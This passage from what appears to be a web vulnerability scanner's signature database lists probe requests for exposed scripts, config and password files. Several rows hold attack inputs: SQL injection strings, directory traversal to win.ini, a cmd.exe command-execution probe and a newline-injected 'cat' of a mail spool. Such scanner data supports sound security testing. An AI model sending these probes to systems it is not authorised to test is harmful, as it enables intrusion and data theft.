scanner.\",\"\",\"\"\n\"002572\",\"\",\"1\",\"/protected/secret.html+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002573\",\"\",\"1\",\"/protectedpage.php?uid=&#039;%20OR%20&#039;&#039;=&#039;&amp;pwd=&#039;%20OR%20&#039;&#039;=&#039;\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002574\",\"\",\"1\",\"/protection.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002575\",\"\",\"1\",\"/pt_config.inc\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002576\",\"\",\"1\",\"/pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002577\",\"\",\"1\",\"/pvote/del.php?pollorder=1%20\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002578\",\"\",\"1\",\"/quikmail/nph-emumail.cgi?type=../%00\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002579\",\"\",\"1\",\"/room/save_item.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002580\",\"\",\"1\",\"/rubrique.asp?no=%60@LFI(abs)%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002581\",\"\",\"1\",\"/rubrique.asp?no=....//....//....//....//....//....//....//etc.hosts|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002582\",\"\",\"1\",\"/rubrique.asp?no=@LFI()%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002583\",\"\",\"1\",\"/rubrique.asp?no=/....../Windows/win.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002584\",\"\",\"1\",\"/rubrique.asp?no=/.../.../.../.../.../.../Windows/win.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002585\",\"\",\"1\",\"/rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../Windows/win.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002586\",\"\",\"1\",\"/rubrique.asp?no=@LFI(abs)|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002588\",\"\",\"1\",\"/rubrique.asp?no=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./Windows/win.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002589\",\"\",\"1\",\"/rubrique.asp?no=@LFI(abs)%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002592\",\"\",\"1\",\"/screen.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002593\",\"\",\"1\",\"/scripts/tradecli.dll\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002594\",\"\",\"1\",\"/scripts/tradecli.dll?template=nonexistfile?template=..\\..\\..\\..\\..\\winnt\\system32\\cmd.exe?/c+dir+/\",\"GET\",\"CODE:200&&BODY:Windows\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002595\",\"\",\"1\",\"/security/web_access.html\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002596\",\"\",\"1\",\"/sendphoto.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002597\",\"\",\"1\",\"/servers/link.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002598\",\"\",\"1\",\"/setpasswd.cgi\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002599\",\"\",\"1\",\"/shop/php_files/site.config.php+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002600\",\"\",\"1\",\"/shop/search.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002601\",\"\",\"1\",\"/shop/show.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002602\",\"\",\"1\",\"/shoutbox/expanded.php?conf=@LFI()%20\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002603\",\"\",\"1\",\"/Site/biztalkhttpreceive.dll\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002604\",\"\",\"1\",\"/site_searcher.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002605\",\"\",\"1\",\"/spelling.php3+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002606\",\"\",\"1\",\"/squirrelmail/src/read_body.php\",\"GET\",\"BODY:Project\\sTeam\",\"SquirrelMail found\",\"\",\"\"\n\"002607\",\"\",\"1\",\"/staticpages/index.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002608\",\"\",\"1\",\"/status.php3\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002609\",\"\",\"1\",\"/supporter/index.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002610\",\"\",\"1\",\"/supporter/tupdate.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002611\",\"\",\"1\",\"/sw000.asp?|-|0|404_Object_Not_Found\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002612\",\"\",\"1\",\"/syslog.htm?%20\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002613\",\"\",\"1\",\"/technote/print.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002614\",\"\",\"1\",\"/texis/websearch/phine\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002615\",\"\",\"1\",\"/tinymsg.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002616\",\"\",\"1\",\"/tmp_view.php?file=@LFI()\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002617\",\"\",\"1\",\"/topic/entete.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002618\",\"\",\"1\",\"/topsitesdir/edit.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002619\",\"\",\"1\",\"/ttforum/index.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002620\",\"\",\"1\",\"/tutos/file/file_new.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002621\",\"\",\"1\",\"/tutos/file/file_select.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002622\",\"\",\"1\",\"@TYPO3typo3/dev/translations.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002623\",\"\",\"1\",\"/uifc/MultFileUploadHandler.php+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002624\",\"\",\"1\",\"/url.jsp\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002625\",\"\",\"1\",\"/useraction.php3\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002626\",\"\",\"1\",\"/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;@LFI(abs,nix)\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002627\",\"\",\"1\",\"/utils/sprc.asp+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002628\",\"\",\"1\",\"/vars.inc+\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002629\",\"\",\"1\",\"/VBZooM/add-subject.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002630\",\"\",\"1\",\"/wbboard/profile.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002631\",\"\",\"1\",\"/wbboard/reply.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002632\",\"\",\"1\",\"/webcalendar/login.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002633\",\"\",\"1\",\"/webcalendar/view_m.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002634\",\"\",\"1\",\"/webmail/lib/emailreader_execute_on_each_page.inc.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002635\",\"\",\"1\",\"/webmail/src/read_body.php\",\"GET\",\"BODY:Project\\sTeam\",\"SquirrelMail found\",\"\",\"\"\n\"002636\",\"\",\"1\",\"/web_app/WEB-INF/webapp.properties\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002637\",\"\",\"1\",\"/XMBforum/buddy.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002638\",\"\",\"1\",\"/XMBforum/member.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002639\",\"\",\"1\",\"/x_stat_admin.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002640\",\"\",\"1\",\"/yabbse/Reminder.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002641\",\"\",\"1\",\"/yabbse/Sources/Packages.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002642\",\"\",\"1\",\"/zentrack/index.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002643\",\"\",\"1\",\"/_head.php\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002644\",\"\",\"1\",\"@CGIDIRSadduser.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002645\",\"\",\"1\",\"@CGIDIRSamadmin.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002646\",\"\",\"1\",\"@CGIDIRSanyboard.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002647\",\"\",\"1\",\"@CGIDIRSAT-generate.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002648\",\"\",\"1\",\"@CGIDIRSauctiondeluxe/auction.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002649\",\"\",\"1\",\"@CGIDIRSawl/auctionweaver.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002650\",\"\",\"1\",\"@CGIDIRSbb-ack.sh\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002651\",\"\",\"1\",\"@CGIDIRSbb-histlog.sh\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002652\",\"\",\"1\",\"@CGIDIRSbb-rep.sh\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002653\",\"\",\"1\",\"@CGIDIRSbb-replog.sh\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002654\",\"\",\"1\",\"@CGIDIRSbbs_forum.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002655\",\"\",\"1\",\"@CGIDIRSbuild.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002656\",\"\",\"1\",\"@CGIDIRSbulk/bulk.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002657\",\"\",\"1\",\"@CGIDIRScached_feed.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002658\",\"\",\"1\",\"@CGIDIRScalender_admin.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002659\",\"\",\"1\",\"@CGIDIRScartmanager.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002660\",\"\",\"1\",\"@CGIDIRScbmc/forums.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002661\",\"\",\"1\",\"@CGIDIRScgforum.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002662\",\"\",\"1\",\"@CGIDIRSchange-your-password.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002663\",\"\",\"1\",\"@CGIDIRSclickresponder.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002664\",\"\",\"1\",\"@CGIDIRScommandit.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002665\",\"\",\"1\",\"@CGIDIRScounter-ord\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002666\",\"\",\"1\",\"@CGIDIRScounterbanner\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002667\",\"\",\"1\",\"@CGIDIRScounterbanner-ord\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002668\",\"\",\"1\",\"@CGIDIRScounterfiglet-ord\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002669\",\"\",\"1\",\"@CGIDIRScounterfiglet/nc/\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002670\",\"\",\"1\",\"@CGIDIRSCSMailto.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002671\",\"\",\"1\",\"@CGIDIRSCSMailto/CSMailto.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002672\",\"\",\"1\",\"@CGIDIRScsNews.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002673\",\"\",\"1\",\"@CGIDIRScsPassword.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002674\",\"\",\"1\",\"@CGIDIRScsPassword/csPassword.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002675\",\"\",\"1\",\"@CGIDIRScutecast/members/\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002676\",\"\",\"1\",\"@CGIDIRSday5datanotifier.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002677\",\"\",\"1\",\"@CGIDIRSdb2www/library/document.d2w/show\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002678\",\"\",\"1\",\"@CGIDIRSdb_manager.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002679\",\"\",\"1\",\"@CGIDIRSDCFORMS98.CGI\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002680\",\"\",\"1\",\"@CGIDIRSdnewsweb\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002681\",\"\",\"1\",\"@CGIDIRSdonothing\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002682\",\"\",\"1\",\"@CGIDIRSezshopper2/loadpage.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002683\",\"\",\"1\",\"@CGIDIRSezshopper3/loadpage.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002684\",\"\",\"1\",\"@CGIDIRSif/admin/nph-build.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002685\",\"\",\"1\",\"@CGIDIRSikonboard/help.cgi?\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002686\",\"\",\"1\",\"@CGIDIRSimageFolio.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002687\",\"\",\"1\",\"@CGIDIRSimagefolio/admin/admin.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002688\",\"\",\"1\",\"@CGIDIRSjournal.cgi?folder=journal.cgi%00\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002689\",\"\",\"1\",\"@CGIDIRSmagiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D@LFI()\",\"GET\",\"@LFI()\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002690\",\"\",\"1\",\"@CGIDIRSmajordomo.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002691\",\"\",\"1\",\"@CGIDIRSmojo/mojo.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002692\",\"\",\"1\",\"@CGIDIRSncommerce3/ExecMacro/macro.d2w/%0a%0a\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002693\",\"\",\"1\",\"@CGIDIRSncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002694\",\"\",\"1\",\"@CGIDIRSnon-existent.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002695\",\"\",\"1\",\"@CGIDIRSnph-exploitscanget.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002696\",\"\",\"1\",\"@CGIDIRSnph-maillist.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002697\",\"\",\"1\",\"@CGIDIRSparse-file\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002698\",\"\",\"1\",\"@CGIDIRSphp-cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002699\",\"\",\"1\",\"@CGIDIRSpollssi.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002700\",\"\",\"1\",\"@CGIDIRSpostcards.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002701\",\"\",\"1\",\"@CGIDIRSprofile.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002702\",\"\",\"1\",\"@CGIDIRSquikstore.cfg\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002703\",\"\",\"1\",\"@CGIDIRSregister.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002704\",\"\",\"1\",\"@CGIDIRSreplicator/webpage.cgi/\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002705\",\"\",\"1\",\"@CGIDIRSrightfax/fuwww.dll/?\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002706\",\"\",\"1\",\"@CGIDIRSrmp_query\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002707\",\"\",\"1\",\"@CGIDIRSrobpoll.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002708\",\"\",\"1\",\"@CGIDIRSscripts/*%0a.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002709\",\"\",\"1\",\"@CGIDIRSsimplestguest.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002710\",\"\",\"1\",\"@CGIDIRSsimplestmail.cgi\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002711\",\"\",\"1\",\"@CGIDIRSstatusconfig.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002712\",\"\",\"1\",\"@CGIDIRSsws/manager.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002713\",\"\",\"1\",\"@CGIDIRStexis/phine\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002714\",\"\",\"1\",\"@CGIDIRSUpload.pl\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002715\",\"\",\"1\",\"@CGIDIRSutm/admin\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002716\",\"\",\"1\",\"@CGIDIRSutm/utm_stat\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002717\",\"\",\"1\",\"/ows-bin/oaskill.exe?abcde.exe\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002718\",\"\",\"1\",\"/ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002719\",\"\",\"1\",\"@CGIDIRS_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002720\",\"\",\"1\",\"@CGIDIRS_vti_pvt/doctodep.btr\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002721\",\"\",\"1\",\"@CGIDIRScfgwiz.exe\",\"GET\",\"CODE:200\",\"cfgwiz.exe is a Norton Anti-Virus file and should not be available via the web site.\",\"\",\"\"\n\"002722\",\"\",\"1\",\"@CGIDIRSCgitest.exe\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002723\",\"\",\"1\",\"@CGIDIRSmailform.exe\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002724\",\"\",\"1\",\"@CGIDIRSms_proxy_auth_query/\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002725\",\"\",\"1\",\"@CGIDIRSpost16.exe\",\"GET\",\"CODE:200\",\"This might be interesting: has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002726\",\"\",\"2\",\"/oem_webstage/oem.conf\",\"GET\",\"BODY:DocumentRoot\",\"Oracle reveals a portion of the Apache httpd.conf file.\",\"\",\"\"\n\"002727\",\"\",\"2\",\"/database/\",\"GET\",\"CODE:200\",\"Database directory found.\",\"\",\"\"\n\"002728\",\"\",\"2\",\"/demo/sql/index.jsp\",\"GET\",\"BODY:JSP SQL Samples\",\"This default may allow connectivity to the Oracle databases.\",\"\",\"\"\n\"002729\",\"\",\"23\",\"@CGIDIRS.htaccess\",\"GET\",\"CODE:200\",\"Contains authorization information\",\"\",\"\"\n\"002730\",\"\",\"23\",\"@CGIDIRS.htaccess.old\",\"GET\",\"CODE:200\",\"Backup/Old copy of .htaccess - Contains authorization information\",\"\",\"\"\n\"002731\",\"\",\"23\",\"@CGIDIRS.htaccess.save\",\"GET\",\"CODE:200\",\"Backup/Old copy of .htaccess - Contains authorization information\",\"\",\"\"\n\"002732\",\"\",\"23\",\"@CGIDIRS.htaccess~\",\"GET\",\"CODE:200\",\"Backup/Old copy of .htaccess - Contains authorization information\",\"\",\"\"\n\"002733\",\"\",\"23\",\"@CGIDIRS.htpasswd\",\"GET\",\"CODE:200\",\"Contains authorization information\",\"\",\"\"\n\"002734\",\"\",\"23\",\"@CGIDIRS.passwd\",\"GET\",\"CODE:200\",\"Contains authorization information\",\"\",\"\"\n\"002735\",\"\",\"3\",\"/.wwwacl\",\"GET\",\"CODE:200\",\"Contains authorization information\",\"\",\"\"\n\"002736\",\"\",\"3\",\"/.www_acl\",\"GET\",\"CODE:200\",\"Contains authorization 